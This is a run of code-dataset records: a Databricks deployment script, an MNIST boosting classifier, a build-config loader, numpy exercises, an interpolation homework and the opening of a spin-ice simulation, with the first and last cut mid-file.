avoid reinstalls if possible\n if 'maven' in requirement:\n coordinate_splitted = requirement['maven']['coordinates'].split(':')\n if not artifact_install_present(coordinate_splitted, existing_artifact_versions):\n final_requirements.append(requirement)\n else:\n final_requirements.append(requirement)\n\n if len(final_requirements) == 0:\n print('Nothing left to install on cluster')\n return\n\n # Cluster needs to be running for installs to work :(\n ensure_cluster_is_running(deploy_url, cluster_id)\n\n url = f'{deploy_url}/libraries/install'\n data = {'cluster_id': cluster_id, 'libraries': final_requirements} # type: ignore\n r = call_post(url, headers=headers, json=data, error_message='Failure in requirements installation')\n print('Libs installed successfully')\n\n\ndef _parse_private_repositories(deploy_url: str, requirements: Dict[str, Any]) -> List[Dict[str, str]]:\n url = f'{deploy_url}/dbfs/put'\n target_install_path = requirements['target_install_path']\n\n required_repos: List[Dict[str, str]] = []\n for repo in requirements['repolist']:\n path_safety_word = str(uuid1())\n copy_path = f'{os.curdir}/{path_safety_word}'\n subproc_run(['git', 'clone', repo, copy_path], cwd=os.curdir, env=os.environ)\n subproc_run(['python3', 'setup.py', 'bdist_egg'], cwd=copy_path)\n egg_path_prefix = f'{copy_path}/dist'\n egg_file = os.listdir(egg_path_prefix)[0]\n current_head = subprocess.check_output(['git', 'rev-parse', 'HEAD']).decode().strip()\n full_install_path = f\"{target_install_path}/{current_head}_{egg_file}\"\n payload = {\"path\": full_install_path}\n files = {\"file\": open(f'{egg_path_prefix}/{egg_file}', 'rb')}\n r = call_post(url, data=payload, files=files, exceptions_not_allowed=False)\n if r.status_code == 400 and r.json().get('error_code') == 'RESOURCE_ALREADY_EXISTS':\n print(f'Current commit {current_head} already exists on the cluster, resuming without upload')\n elif r.status_code != 200:\n raise Exception(f'Error while uploading egg: {r.status_code}, {r.reason}, {r.text}')\n required_repos.append({\"egg\": full_install_path})\n assert (path_safety_word in copy_path)\n shutil.rmtree(copy_path, ignore_errors=False)\n return required_repos\n\n\ndef _parse_jar_requirement(deploy_url: str, requirements: List[Dict[str, str]]) -> List[Dict[str, str]]:\n required_jars: List[Dict[str, str]] = []\n url = f'{deploy_url}/dbfs/put'\n for jar in requirements:\n # convert_code_to_base64(jar['local_path'])\n payload = {\"path\": jar['target_path']}\n file = {'file': open(jar['local_path'], 'rb')}\n r = call_post(url, data=payload, files=file, exceptions_not_allowed=False)\n if r.status_code == 400 and r.json().get('error_code') == 'RESOURCE_ALREADY_EXISTS':\n print(f'Current jar {jar[\"local_path\"]} already exists on the cluster, resuming without upload')\n elif r.status_code != 200:\n raise Exception(f'Error while uploading egg: {r.status_code}, {r.reason}, {r.text}')\n required_jars.append({\"jar\": jar[\"target_path\"]})\n return required_jars\n\n\ndef _parse_maven_requirement(requirements: List[str]) -> List[Dict[str, Any]]:\n required_artifacts: List[Dict[str, Any]] = []\n for artifact in requirements:\n latest_required = artifact.split(':')[-1] == 'LATEST'\n artifact_coordinate = artifact\n if latest_required:\n latest_version = get_latest_maven_artifact(artifact)\n artifact_coordinate = artifact.replace('LATEST', latest_version)\n required_artifacts.append({'maven': {'coordinates': artifact_coordinate}})\n return required_artifacts\n\n\ndef create_requirements_install_info(deploy_url: str, requirements: Dict[str, Any]) -> List[Dict[str, Any]]:\n # See if all requirements are found from the cluster already\n required_setup: List[Dict[str, Any]] = []\n if 'maven' in requirements:\n required_setup.extend(_parse_maven_requirement(requirements['maven']))\n if 'pypi' in requirements:\n required_setup.extend([{'pypi': {'package': pkg}} for pkg in requirements['pypi']])\n\n # Upload local_jars and private_repos to cluster, use given upload path as path to install from\n if 'local_jars' in requirements:\n required_setup.extend(_parse_jar_requirement(deploy_url, requirements['local_jars']))\n if 'private_repositories' in requirements:\n required_setup.extend(_parse_private_repositories(deploy_url, requirements['private_repositories']))\n return required_setup\n\n\ndef deploy_notebook(env: str, deploy_url: str, config: Dict[str, Any]) -> None:\n config['cluster_id'] = inject_matching_cluster_id(deploy_url, env, config['CLUSTER'])\n if config.get('requirements'):\n requirements = create_requirements_install_info(deploy_url, config['requirements'])\n deploy_requirements_to_databricks(deploy_url, config['cluster_id'], requirements)\n config['absolute_job_path'], config['parsed_job_name'] = inject_job_path(env, config)\n config['encoded_code'] = convert_code_to_base64(config['JOB_TO_DEPLOY'])\n push_code_to_databricks(deploy_url, config)\n if config['SCHEDULE_ENABLED'].lower() == 'true':\n apply_job_scheduling(env, deploy_url, config)\n","sub_path":"azure/databricks_notebook.py","file_name":"databricks_notebook.py","file_ext":"py","file_size_in_byte":17095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"595375454","text":"from mnist import MNIST\nimport sklearn.metrics as metrics\nfrom pylab import *\nimport sklearn.preprocessing as pp\nimport numpy as np\nfrom labels_to_current import otft_classifier_real\nimport random\nimport cv2\nimport scipy.stats\nfrom labels_to_current import otft_classifier_real\nimport matplotlib.pyplot as plt\nfrom save_csv import results_to_csv\nfrom sklearn.ensemble import AdaBoostClassifier\n\nNUM_CLASSES = 10\nPREF_DIGIT = 9\nNUM_WEAK_CLASSIFIERS = 4\n\ndef load_dataset(N_new):\n # digit 7\n # random.seed(10)\n # digit 0\n # random.seed(3)\n # digit 4\n # random.seed(10)\n random.seed(5)\n mndata = MNIST('mnist_benchmark/')\n X_train, labels_train = map(np.array, mndata.load_training())\n N = 2000\n #-----\n N_pref = int(N*0.4)\n index_pref = list(np.nonzero(labels_train == PREF_DIGIT)[0])\n index_pref = random.sample(index_pref, N_pref)\n index_not_pref = list(np.nonzero(labels_train != PREF_DIGIT)[0])\n index_not_pref = random.sample(index_not_pref, N-N_pref)\n index = []\n index.extend(index_pref)\n index.extend(index_not_pref)\n random.shuffle(index)\n X_train = X_train[index]\n labels_train = labels_train[index]\n #------\n X_train = X_train[0:N]\n labels_train = labels_train[0:N]\n X_test, labels_test = map(np.array, mndata.load_testing())\n #------\n Ntest = 2000\n N_pref = int(Ntest * 0.4)\n index_pref = list(np.nonzero(labels_test == PREF_DIGIT)[0])\n index_pref = random.sample(index_pref, N_pref)\n index_not_pref = list(np.nonzero(labels_test != PREF_DIGIT)[0])\n index_not_pref = random.sample(index_not_pref, Ntest - N_pref)\n index = []\n index.extend(index_pref)\n index.extend(index_not_pref)\n random.shuffle(index)\n X_test = X_test[index]\n labels_test = labels_test[index]\n #------\n\n X_train = np.reshape(X_train, (N, 28, 28)).astype('float32')\n X_test = np.reshape(X_test, ( X_test.shape[0], 28, 28)).astype('float32')\n X_train_n = []\n X_test_n = []\n for img in X_train:\n X_train_n.append(cv2.resize(img, (N_new, N_new)))\n for img in X_test:\n X_test_n.append(cv2.resize(img, (N_new, N_new)))\n X_train_n = np.array(X_train_n)\n X_test_n = np.array(X_test_n)\n X_train_n = X_train_n/255.0\n X_test_n = X_test_n/255.0\n N2 = N_new*N_new\n X_train = np.reshape(X_train_n, (N, N2))\n X_test = np.reshape(X_test_n, (X_test.shape[0], N2))\n return (X_train, labels_train), (X_test, labels_test)\n\n\ndef weak_train(X_train, y_train, weighting, reg=0.9):\n ''' Build a model from X_train -> y_train '''\n x_vectors = X_train\n y_vectors = y_train\n\n a = np.dot(np.transpose(x_vectors), np.transpose(list(map(lambda el: np.multiply(weighting, el), x_vectors.T))))\n b = np.dot(np.transpose(x_vectors), np.multiply(weighting, list(y_vectors)))\n a += (reg*np.identity(x_vectors.shape[1]))\n\n return np.dot(np.linalg.inv(a), b)\n\n\n\ndef weak_train_otft_perceptron(X_train, y_train, weighting, cost_interval=1, decr_learning_rate=False,\n iterations=100, learning_rate_fn=None, stochastic=False,\n verbose=False, reg=0, eps=0.0000005):\n\n cost = []\n X_train = np.transpose(list(map(lambda el: np.multiply(weighting, el), X_train.T)))\n y_train = np.array(y_train)\n #w = np.zeros(X_train.shape[1])\n w = y_train[15]*X_train[15]\n if learning_rate_fn is None and decr_learning_rate:\n learning_rate_fn = lambda eps, t: eps / (t + 1)\n elif not decr_learning_rate:\n learning_rate_fn = lambda eps, t: eps\n for t in range(iterations):\n index = random.randint(0, X_train.shape[0] - 1)\n X_t = X_train[index] if stochastic else X_train\n #s_t = 4.98117692e-10*2.0e4*np.matmul(X_t, w)\n #s_t, XT_t, R = otft_classifier_real(w, X_t)\n s_t = np.matmul(X_t, w)\n y_t = y_train[index] if stochastic else y_train\n mult_ys_t = np.multiply(y_t, s_t)\n index_cost_t = np.nonzero(mult_ys_t < 0)\n XT_t = X_t\n if t % cost_interval == 0:\n s = s_t\n mult_ys = np.multiply(y_train, s)\n index_cost = np.nonzero(mult_ys < 0)\n train_cost = -np.sum(mult_ys[index_cost])\n reg_cost = reg * np.linalg.norm(w) ** 2\n loss = train_cost + reg_cost\n cost.append(loss)\n if verbose:\n print(\"Iteration {}, Cost {}\".format(t, loss))\n X_n = XT_t[index_cost_t]\n y_n = y_t[index_cost_t]\n #grad = 4.98117692e-10*2.0e4*np.dot(X_n.T, y_n)\n grad = np.dot(X_n.T, y_n)\n train_grad = -np.sum(grad)\n reg_grad = 2 * reg * w\n eps = learning_rate_fn(eps, t)\n w = w - eps * (train_grad + reg_grad)\n return w\n\ndef one_hot(labels_train):\n '''Convert categorical labels 0,1,2,....9 to standard basis vectors in R^{10} '''\n matrix = np.zeros((X_train.shape[0], NUM_CLASSES))\n i = 0;\n for label in labels_train:\n matrix[i][label] = 1\n i = i + 1;\n return matrix\n\ndef signarize(labels_train):\n return map(lambda el: 1.0 if el == PREF_DIGIT else -1.0,labels_train)\n\ndef dot_product(model, X):\n return np.dot(model, X)\n\ndef weak_predict(model, X,out):\n ''' From model and data points, output prediction vectors '''\n W = np.transpose(model)\n results = np.zeros(X.shape[0])\n i = 0\n #pred = np.matmul(X, W)\n #pred = 0.2 / 3 * np.matmul(X, W) + 0.8 / 3 * np.sum(X, axis=1) - 0.1 * np.sum(W)\n pred, _, _ = otft_classifier_real(W, X)\n for item in pred:\n if item > out:\n results[i] = 1.0\n else:\n results[i] = -1.0\n i = i + 1\n\n print(\"Max : \", np.max(pred), \"\\nMin:\", np.min(pred))\n\n return results\n\ndef strong_train(X_train, y_train,eps,NUMM):\n NUM_WEAK_CLASSIFIERS = NUMM\n #should return matrix of weight vectors and alphas\n alphas = np.zeros(NUM_WEAK_CLASSIFIERS)\n weights = np.zeros((NUM_WEAK_CLASSIFIERS, X_train.shape[1]))\n #the 0th is extra - discard before returning\n\n step_size = int(X_train.shape[0] / (NUM_WEAK_CLASSIFIERS + 1))\n step_size = X_train.shape[0]\n\n prev = X_train[0:step_size] # initial sub-dataset\n prev_y = y_train[0:step_size]\n\n i = 0\n\n while (i / step_size) < NUM_WEAK_CLASSIFIERS:\n ith = int(i / step_size)\n\n weighting = np.ones(step_size)\n for j in range(step_size):\n weighting[j] = 1.0 / (1.0 + np.exp(prev_y[j] * strong_eval(prev[j], weights, alphas, iters=(ith))))\n\n norm = np.linalg.norm(weighting)\n if norm != 0.0:\n weighting = weighting/norm\n\n #weighting = np.ones(step_size)\n weights[ith] = weak_train(prev, prev_y, weighting)\n #weights[ith] = weak_train_otft_perceptron(prev, prev_y, weighting = weighting, stochastic=False, verbose=True, eps=eps,iterations=70)\n\n #we increment here b/c from here on out we use a new slice of data\n i = i + step_size\n\n\n # prev = X_train[i : i + step_size]\n # prev_y = y_train[i : i + step_size]\n prev = X_train[0:step_size] # initial sub-dataset\n prev_y = y_train[0:step_size]\n\n epsilon = 0.0\n pred = np.zeros(step_size)\n for j in range(step_size):\n pred[j] = dot_product(weights[ith], prev[j])\n pred = np.sign(pred)\n for j in range(step_size):\n epsilon = epsilon + (pred[j] == 1.0)\n epsilon = epsilon / step_size\n\n alpha = 0.5 * np.log((1 - epsilon) / epsilon)\n alphas[ith] = alpha\n\n\n return weights, alphas\n\ndef strong_eval(x, weights, alphas, iters=NUM_WEAK_CLASSIFIERS):\n if(iters == 0):\n return 0.0\n result = 0.0\n for i in range(iters):\n result = result + alphas[i] * dot_product(weights[i], x)\n return result\n\ndef strong_eval_otft(x, weights, alphas, iters=NUM_WEAK_CLASSIFIERS, single=False):\n if(iters == 0):\n return 0.0\n result = 0.0\n for i in range(iters):\n pred,_,_ = otft_classifier_real(weights[i], x, single)\n result = result + alphas[i] * pred\n return result\n\ndef strong_predict(X_train, weights, alphas, out=0, NUMM=NUM_WEAK_CLASSIFIERS):\n results = np.zeros(X_train.shape[0])\n i = 0\n\n for data in X_train:\n pred = strong_eval(data, weights, alphas, NUMM)\n if pred > out:\n results[i] = 1.0\n else:\n results[i] = -1.0\n i = i + 1\n\n return results\n\ndef strong_predict_otft(X_train, weights, alphas, out, NUMM=NUM_WEAK_CLASSIFIERS):\n results = np.zeros(X_train.shape[0])\n i = 0\n pred = strong_eval_otft(X_train, weights, alphas, iters=NUMM)\n for item in pred:\n if item > out:\n results[i] = 1.0\n else:\n results[i] = -1.0\n i = i + 1\n print(\"Max : \", np.max(pred), \"\\nMin:\", np.min(pred))\n return results\n\n\ndef AdaBoost_scratch(X, y, M=10, learning_rate=1, out=0):\n # Initialization of utility variables\n N = len(y)\n estimator_list, y_predict_list, estimator_error_list, estimator_weight_list, sample_weight_list = [], [], [], [], []\n\n # Initialize the sample weights\n sample_weight = np.ones(N) / N\n sample_weight_list.append(sample_weight.copy())\n\n # For m = 1 to M\n for m in range(M):\n # Fit a classifier\n model = weak_train_otft_perceptron(X, y, np.ones(X.shape[0]), verbose=False,\n eps=10 ** (-2.8), iterations=70)\n y_predict = weak_predict(model, X,out = out)\n\n # Misclassifications\n incorrect = (y_predict != y)\n\n # Estimator error\n estimator_error = np.mean(np.average(incorrect, weights=sample_weight, axis=0))\n\n # Boost estimator weights\n estimator_weight = learning_rate * np.log((1. - estimator_error) / estimator_error)\n\n # Boost sample weights\n sample_weight *= np.exp(estimator_weight * incorrect * ((sample_weight > 0) | (estimator_weight < 0)))\n\n # Save iteration values\n estimator_list.append(model)\n y_predict_list.append(y_predict.copy())\n estimator_error_list.append(estimator_error.copy())\n estimator_weight_list.append(estimator_weight.copy())\n sample_weight_list.append(sample_weight.copy())\n\n # Convert to np array for convenience\n estimator_list = np.asarray(estimator_list)\n y_predict_list = np.asarray(y_predict_list)\n estimator_error_list = np.asarray(estimator_error_list)\n estimator_weight_list = np.asarray(estimator_weight_list)\n sample_weight_list = np.asarray(sample_weight_list)\n\n # Predictions\n preds = (np.array([np.sign((y_predict_list[:, point] * estimator_weight_list).sum()+out) for point in range(N)]))\n print('Accuracy = ', (preds == y).sum() / N)\n accuracy = (preds == y).sum() / N\n\n return accuracy, estimator_list, estimator_weight_list, sample_weight_list\n\n\n# def AdaBoost_scratch(X, y, M=10, learning_rate=1, out=0):\n\n\nif __name__ == \"__main__\":\n N_new = 28\n (X_train, labels_train), (X_test, labels_test) = load_dataset(N_new)\n X_train = X_train*3+0.8\n X_test = X_test*3+0.8\n print(X_test.shape, labels_test)\n\n ones_X_train = np.ones((X_train.shape[0], 1))\n X_train = np.append(X_train, ones_X_train, axis=1)\n\n ones_X_test = np.ones((X_test.shape[0], 1))\n X_test = np.append(X_test, ones_X_test, axis=1)\n\n labels_train, labels_test = list(signarize(labels_train)), list(signarize(labels_test))\n\n #========== Weak boosted classifier ==========\n # accuracy_train = []\n # accuracy_test = []\n #\n # a = -0.04\n # b = 0.01\n # numm = 20\n # #model = weak_train(X_train, labels_train, np.ones(X_train.shape[0]), reg = 0.9)\n # for i in linspace(a,b,numm):\n # model = weak_train_otft_perceptron(X_train, labels_train, np.ones(X_train.shape[0]), verbose=False,eps=10**(-7), iterations = 70)\n # #model = weak_train(X_train, labels_train, np.ones(X_train.shape[0]), reg = 0.9)\n #\n #\n # weak_pred_labels_train = weak_predict(model, X_train,out=i)\n # weak_pred_labels_test = weak_predict(model, X_test,out=i)\n #\n #\n # print(\"\\nWeak train accuracy: {0}\".format(metrics.accuracy_score(labels_train, weak_pred_labels_train)))\n # print(\"Weak validation accuracy: {0}\".format(metrics.accuracy_score(labels_test, weak_pred_labels_test)))\n # accuracy_train.append(metrics.accuracy_score(labels_train, weak_pred_labels_train))\n # accuracy_test.append((metrics.accuracy_score(labels_test, weak_pred_labels_test)))\n\n # plt.plot(linspace(a,b,numm),accuracy_train,label='Training Data')\n # plt.plot(linspace(a,b,numm), accuracy_test,label='Test Data')\n # plt.xlabel('threshold voltage')\n # plt.title(\"Accuracy of the Weak Classifier vs. threshold voltage\")\n # plt.legend()\n # plt.show()\n #\n # plt.plot(model)\n # print(max(model),min(model))\n # plt.show()\n\n # #========== Strong boosted classifier ==========\n a = 1\n b = 6\n # a = -0.002\n # b = 0.008\n numm = 6\n accuracy_train = []\n accuracy_test = []\n #model = weak_train(X_train, labels_train, np.ones(X_train.shape[0]), reg = 0.9)\n for i in linspace(a,b,numm):\n\n # #Strong vs Vth\n # weights, alphas = strong_train(X_train, labels_train, eps=10 ** (-7.2), NUMM=4)\n # strong_pred_labels_train = strong_predict_otft(X_train, weights, alphas, out=i, NUMM=4)\n # strong_pred_labels_test = strong_predict_otft(X_test, weights, alphas, out=i, NUMM=4)\n\n # Strong vs. num of weak classifiers\n weights, alphas = strong_train(X_train, labels_train,eps=10**(-7.2), NUMM=int(i))\n strong_pred_labels_train = strong_predict_otft(X_train, weights, alphas, out=0.006, NUMM=int(i))\n strong_pred_labels_test = strong_predict_otft(X_test, weights, alphas, out=0.006, NUMM=int(i))\n\n\n #model = AdaBoostClassifier(n_estimators=5, random_state=10)\n\n print(\"Strong train accuracy: {0}\".format(metrics.accuracy_score(labels_train, strong_pred_labels_train)))\n print(\"Strong validation accuracy: {0}\".format(metrics.accuracy_score(labels_test, strong_pred_labels_test)))\n\n\n accuracy_train.append(metrics.accuracy_score(labels_train, strong_pred_labels_train))\n accuracy_test.append((metrics.accuracy_score(labels_test, strong_pred_labels_test)))\n\n # accuracy,_,_,_ = AdaBoost_scratch(X_train, labels_train, M=10, learning_rate=1,out=i)\n # accuracy_train.append(accuracy)\n\n Vth = linspace(a,b,numm)\n results_to_csv(accuracy_train,'accuracy_train')\n results_to_csv(accuracy_test, 'accuracy_test')\n results_to_csv(Vth, 'Vth')\n plt.plot(Vth,accuracy_train, label='Training Data')\n plt.plot(Vth, accuracy_test, label='Test Data')\n plt.xlabel('Number of Weak Classifiers')\n #plt.xlabel('Vth(mV)')\n plt.title(\"Accuracy\")\n plt.legend()\n plt.show()","sub_path":"classifier_strong.py","file_name":"classifier_strong.py","file_ext":"py","file_size_in_byte":14802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"265482191","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nPackage that reads, parses and processes the configuration file\n\"\"\"\n\n## \\package makeprojects.config\n\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport os\nfrom shutil import copyfile\nfrom burger import get_windows_host_type, import_py_script\n\n## build_rules.py file to detect secondly\nBUILD_RULES_PY = 'build_rules.py'\n\n## BUILD_RULES_PY location environment variable\n_BUILD_RULES_VAR = 'BUILD_RULES'\n\n## Location of the user's home directory\nUSER_HOME = os.path.expanduser('~')\n\nif 'MAKE_PROJECTS_HOME' in os.environ:\n ## Location of makeprojects home directory if redirected\n PROJECTS_HOME = os.environ['MAKE_PROJECTS_HOME']\nelse:\n PROJECTS_HOME = USER_HOME\n\n########################################\n\n\ndef save_default(working_directory=None, destinationfile=BUILD_RULES_PY):\n \"\"\"\n Calls the internal function to save a default .projectsrc file\n\n Given a pathname, create and write out a default .projectsrc file\n that can be used as input to makeprojects to generate project files.\n\n Args:\n working_directory: Directory to save the destination file\n destinationfile: Pathname of where to save the default configuation file\n \"\"\"\n\n # If the destination is not an absolute path...\n if not os.path.isabs(destinationfile):\n # Prepend the working directory\n if not working_directory:\n working_directory = os.getcwd()\n # Create the path to store the configuration file\n destinationfile = os.path.join(working_directory, destinationfile)\n\n # Get the source file path\n src = os.path.join(\n os.path.dirname(\n os.path.abspath(__file__)),\n BUILD_RULES_PY)\n\n # Copy the file\n try:\n copyfile(src, destinationfile)\n except OSError as error:\n print(error)\n\n########################################\n\n\ndef find_default_build_rules():\n \"\"\"\n Search for the build_rules.py file.\n\n Scan for the build_rules.py file starting from the current working directory\n and search downwards until the root directoy is it. If not found, search in\n the user's home directory or for linux/macOS, in /etc\n\n Returns:\n Pathname of the configuration file, or None if no file was found.\n \"\"\"\n\n # See if there's an environment variable pointing to a file\n while True:\n if _BUILD_RULES_VAR in os.environ and os.path.exists(\n os.environ[_BUILD_RULES_VAR]):\n result = os.environ[_BUILD_RULES_VAR]\n if os.path.isfile(result):\n break\n\n # Scan the usual suspects for a global instance\n\n # If '~' doesn't expand or /root, use the current folder\n if USER_HOME not in ('~', '/root'):\n # Check the user's home folder\n result = os.path.join(USER_HOME, BUILD_RULES_PY)\n if os.path.isfile(result):\n break\n\n result = os.path.join(USER_HOME, '.config', BUILD_RULES_PY)\n if os.path.isfile(result):\n break\n\n # If not found, use /etc/projectsrc for system globals on non\n # windows platforms\n if not get_windows_host_type():\n result = '/etc/' + BUILD_RULES_PY\n if os.path.isfile(result):\n break\n\n result = os.path.join(\n os.path.dirname(\n os.path.abspath(__file__)),\n BUILD_RULES_PY)\n break\n\n return result\n\n\n## Full pathname of the configuration file\nDEFAULT_BUILD_RULES = find_default_build_rules()\n\n########################################\n\n\ndef import_configuration(file_name=None, verbose=True):\n \"\"\"\n Load in the configuration file\n\n Using the file PROJECTSRC, load it in and parse it as an INI\n file using the configparser python class.\n\n Args:\n file_name: File to load for configuration\n verbose: If True, print the loaded file''s name.\n\n Returns:\n An empty parser object or filled with a successfully loaded file\n \"\"\"\n\n if file_name is None:\n file_name = DEFAULT_BUILD_RULES\n\n build_rules = None\n if file_name and os.path.exists(file_name):\n build_rules = import_py_script(file_name)\n if verbose:\n if build_rules:\n print('Using configuration file {}'.format(file_name))\n else:\n print('build_rules.py was corrupt.')\n else:\n if verbose:\n print('No configuration file found, using defaults')\n build_rules = import_py_script(\n os.path.join(\n os.path.dirname(\n os.path.abspath(__file__)),\n BUILD_RULES_PY))\n return build_rules\n","sub_path":"makeprojects/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"580841699","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n\n\n# In[148]:\n\n\nx=np.array([5,2,9,4])\ny=np.array([10,9,4,3])\nz=np.array([2.5,9.7,1.2,2.4])\nnum=np.array([-1.6,-2.9,-3.0,-8.9])\nangles=np.array([90,180,270,360])\nset=np.array([2,2,2,3,4,3,9,9,8,7,7])\n\n\n# In[22]:\n\n\nsqrt=np.sqrt(x)\npower=np.power(x,3)\nmean=np.mean(x)\nexp=np.exp(x)\nlog=np.log(x)\nlog2=np.log2(x)\nlog10=np.log10(x)\na=np.reciprocal(x)\nb=np.isreal(x)\nc=np.square(x)\n\n\n# In[26]:\n\n\nsqrt,power,mean,exp,log,log2,log10,a,b,c\n\n\n# In[27]:\n\n\nx,y,z\n\n\n# In[54]:\n\n\nabsolute=np.absolute(num)\nd=np.maximum(x,y)\nf=np.minimum(x,y)\n\n\n# In[55]:\n\n\nabsolute,d,f\n\n\n# In[108]:\n\n\nsinit=np.sin(angles)\nsinit\n\n\n# In[57]:\n\n\nnp.cos(angles)\n\n\n# In[58]:\n\n\nnp.tan(angles)\n\n\n# In[171]:\n\n\nsumit=np.sum(x)\nadd=np.add(x,y)\nmul=np.multiply(x,y)\ndivision=np.divide(x,y)\ndiff=np.subtract(x,y)\ntru=np.trunc(z)\nfixit=np.fix(num)\nroundnum=np.around(sinit,2)\nflornum=np.floor(sinit)\nceil=np.ceil(num)\nmodit=np.mod(x,y)\ndivnmod=np.divmod(x,y)\ncumsum=np.cumsum(x)\n\n\n# In[172]:\n\n\nsumit,add,mul,division,diff,tru,fixit,roundnum,flornum,ceil,modit,divnmod,cumsum\n\n\n# In[138]:\n\n\nnum1=20\nnum2=30\nlcm=np.lcm(num1,num2)\ngcd=np.gcd(num1,num2)\nlcm,gcd\n\n\n# In[136]:\n\n\nlcmit=np.lcm.reduce(x)\ngcdit=np.gcd.reduce(x)\n\n\n# In[137]:\n\n\nlcmit,gcdit\n\n\n# In[145]:\n\n\nd2r=np.deg2rad(angles)\nr2d=np.rad2deg(d2r)\n\n\n# In[146]:\n\n\nd2r,r2d\n\n\n# In[161]:\n\n\nu=np.unique(set)\nunion=np.union1d(set,u)\nintersection=np.intersect1d(set,x)\n\n\n# In[158]:\n\n\nu,union,intersection\n\n\n# In[176]:\n\n\ndif=np.diff(x)\ndiff=np.diff(x,n=2)\nwhere=np.where(u>5,\"ok\",\"nok\")\n\n\n# In[177]:\n\n\ndif,diff,where\n\n\n# In[183]:\n\n\nmatrix1=np.random.randn(2,3)\nmatrix2=np.random.randn(3,2)\n\n\n# In[184]:\n\n\nmatrix1,matrix2\n\n\n# In[192]:\n\n\ndot=matrix1.dot(matrix2)\ntp=matrix1.transpose()\nplus=matrix1+matrix1\nminus=matrix2-matrix2\n\n\n# In[195]:\n\n\ndot,tp,plus,minus,matrix1.trace()\n\n\n# In[197]:\n\n\nbase=2\nperp=3\nnp.hypot(base,perp)\n\n\n# In[198]:\n\n\nnp.arcsin(1)\n\n\n# In[199]:\n\n\nnp.arccos(1)\n\n\n# In[200]:\n\n\nnp.arctan(1)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"np-assign1.py","file_name":"np-assign1.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"18157907","text":"#Q18.28\nimport numpy as np\nprint(\"exact result is 7.986 \\n\")\n# linear interpolation\nprint(\"linear interpolation\")\nf1=8.418+((7.305-8.418)/(32-24))*(27-24) #線性內插的公式\nprint(f1)\n\n#牛頓內插\nprint(\"\\n牛頓內插\")\ny=np.array([11.843,9.870,8.418,7.305])\nx=np.array([8,16,24,32])\nyint=[]\nea=[]\nn=4\nfdd = np.zeros((n,n), dtype=np.float)\n\nfor i in range(0,n):\n fdd[i,0]=y[i] #將f(x)存入fdd\n#print(fdd)\nfor j in range(1,n):\n for i in range(0,n-j):\n fdd[i,j]=(fdd[i+1,j-1]-fdd[i,j-1])/(x[i+j]-x[i]) #計算係數,fdd[0,1]是f[x1,x0]依此類推\n#print(fdd)\nxterm=1\nyint.append(fdd[0,0])\nfor order in range(1,n):\n xterm=xterm*(27-x[order-1]) #計算(x-x0),(x-x0)(x-x1).....\n #print(x[order-1])\n yint2=yint[order-1]+fdd[0,order]*xterm #計算fn(x)\n ea.append(yint2-yint[order-1]) #算誤差\n yint.append(yint2) #將yint2存入yint\nprint(yint[n-1])\n\n\n#-----------------------------------------------------------------------------------\n#cubic spline\ny=np.array([11.843,9.870,8.418,7.305])\nc=np.array([8,16,24,32])\nx=np.array([[3.0],[3.0]])\nn=4\nb=np.zeros((n-2,1), dtype=np.float)\nh=np.zeros((n-2,n-2), dtype=np.float)\n\ns=[]\nh1=8\n\nh[0,0]=4*h1 #第一列的值[4h,h,0,0...]\nh[0,1]=h1\nfor i in range(1,n-2): #將除了第一列和最後一列的值存進矩陣(帶狀矩陣)\n for j in range(0,n-3):\n if i==j: #如果是對角線,就存入4h,對角線兩側存h\n h[i,j]=h1*4\n h[i,j+1]=h1\n h[i,j-1]=h1\nh[n-3,n-3]=4*h1 #最後一列的值\nh[n-3,n-4]=h1\n\nfor k in range(0,n-2): #計算課本公式18.37等候右邊的值,存進b矩陣\n b[k,0]=(6/(h1))*(y[k+2]-y[k+1])+(6/(h1))*(y[k]-y[k+1])\n\n#---------------高斯消去------------------\nn=n-2\ntol=0.05\ner=0\n\nfor i in range(0,n,1):\n s.append(abs(h[i,0])) #將h[i,0]加入s矩陣\n #print(s[i])\n for j in range(1,n):\n if abs(h[i,j])>s[i]: #如果同一列有數大於s[i](同一列第一個被加進去的數),較大的就取代之,直到s矩陣是每一列最大的數\n s[i]=(abs(h[i,j]))\n#eliminate\nfor k in range(0,n-1): #交換+前消\n#pivot\n p=k #p為列號\n big=abs(h[k,k]/s[k]) #pivot=對角線數/最大值\n for o in range(k+1,n): #從下一列開始比較(k+1列),找pivot最大的列\n dummy=abs(h[o,k]/s[o]) #假設dum=某列的值/某列最大值\n if dummy>big: #如果dum>big,即某列值/最大值>原列值/最大值\n big=dummy #pivot值改成dum\n p=o #p由k列改成o\n if p!=k: #如果p不等於k:\n for m in range(k,n):#把第一列和下面的列數比較,若p不等於k則每一列元素和原本的互換,\n d=h[p,m] #a矩陣的互換\n h[p,m]=h[k,m]\n h[k,m]=d\n c=b[p,0] #b矩陣互換\n b[p,0]=b[k,0]\n b[k,0]=c\n \n e=s[p] #s矩陣互換\n s[p]=s[k]\n s[k]=e\n\n if abs(h[k,k]/s[k])> Vertex matrix size= (Xcell-1)x(Ycell-1)\nM, N = 2*Xcell+1, 2*Ycell+1 ## Matrix size representing the ASI array for calculations and representations \nits = 300 # Total number of iterations\n#S, Sxy, Sx, Sy = ASI_Lattice(M,N,0) # ASI lattice generate function ASI_Lattice(Rows,Colums, Initial state {0:randomn, 1: DPS}) ; #Sxy[:,1,0] #[x=0 or y=1,row, column]\n\n#============Control switches==================================================\ndipolar_switch = 1\nexchange_switch = 0\nExchange_Bias = 0\ngraphs = 1\n\n#================ External parameters =========================================\n#T = 0.10 # System temperature\n#kb = 1 # 1.38064852e-23 # Boltman constant\n#b = 3 # inverse temperature 1/kT typical=1\nHa = 0.01 # Applied magnetic field Hc ~ 1.30\nphi_H = 0 # Applied magnetic field direction\nH = (Ha*math.cos(math.radians(phi_H)), Ha*math.sin(math.radians(phi_H))) # Applied magnetic field\nC = 1 #1e-7 # Dipolar interaction constant 